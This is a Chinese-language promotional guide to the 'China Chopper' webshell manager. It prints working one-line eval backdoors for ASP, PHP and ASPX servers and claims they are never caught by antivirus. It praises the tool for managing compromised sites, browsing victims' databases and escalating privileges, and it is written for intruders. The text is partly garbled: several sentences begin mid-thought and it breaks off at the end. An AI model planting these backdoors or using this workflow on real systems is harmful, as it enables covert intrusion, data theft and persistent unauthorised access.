文档介绍：神器中国菜刀高级使用方法
[attach]268[/attach]
Asp环境:<%eval request("a")%>
Php环境:<?php ***@eval($_POST['a']);?>
Aspx环境:<% ***@page Language="Jscript"><%eval(["a"],"unsafe");%>
是不是很震憾,很不可思议,是的,我刚接触的时候,也是这样的想法,就这三句话,一个名不见经传的“中国菜刀”,就可以代替我那搜集了几年,大大小小几百个多种平台多种环境的脚本后门?,事实证明,我错了,原来“中国菜刀”不仅仅可以代替那些后门,而且他的功能超出我的想象,就让我慢慢说明吧。
,你的脚本是不是经常被杀,你怎么变形都被杀,,传到服务器被杀导致被管理员发现,结果你的权限就没了,杀到你欲哭无泪。菜刀的一句话后门,可以避免这个问题,只有短短的一行代码,永远不会被查杀。
,框架变形,字体变框框,点击菜单无效,这个是因为系统语言不兼容造成的,菜刀是UINCODE方式编译,支持多国语言输入显示,完全不存在兼容性问题。
,你每次都拿记事本记下来,需要的时候,又去翻半天,弄得你很累很没脾气。有了“菜刀”,你可以很方便管理你的webshell,所有的记录都保存在加密的本地数据库里,而且支持webshell分类,让你管理得井井有条。菜刀不仅有临时锁定功能,方便你离开电脑的那小会时间不被别人偷你的webshell,也有加密功能,不输对密码,HOHO,偷了你的数据也没用。
,这个是菜刀最最强大的功能,精通各平台主流数据库的作者,把这个功能写的是淋漓尽致。支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS等等数据库,支持不是最主要的,功能强大,人性化才是最主要的,“菜刀”的数据库操作界面,内置了常用的数据库语句,非常直观的表列名浏览功能,自动显示表名,列名,查询语句,非常人性化的设计,更内置了不少自建的函数,方便不懂数据库的菜鸟,都能查阅数据库里的数据,再说个“菜刀”数据库管理的一个小技巧,ess数据库,可以在菜刀的webshell操作界面,对着MDB文件点右键,ess Management,ess的数据库操作界面了,方便吧,嘿嘿!!
,webshell的提权总是最让人关心的,说到提权,就不能说到webshell上的cmd执行了,有些朋友并不了解菜刀的自定义CMD路径功能,有两种方法可以设置指定的cmd路径,一就是在cmd操作界面,输入setp d:\,就可以了,,然后点右键,点virtual terminal file,,同样的,再给个cmd使用的小技巧,在菜刀的命令行里,可以使用cd等命令跳转目录,方便吧,嘿嘿!!嗯,另外,新版菜刀新增常用目录管理功能,你可以把你常用的目录或者提权的目录加进菜刀里,这样很方便你提权或者日常工作,是不是比那些固定了提权目录的脚本后门要牛B的多啊,哈哈。
,也是非常人性化的,文件夹和文件的图标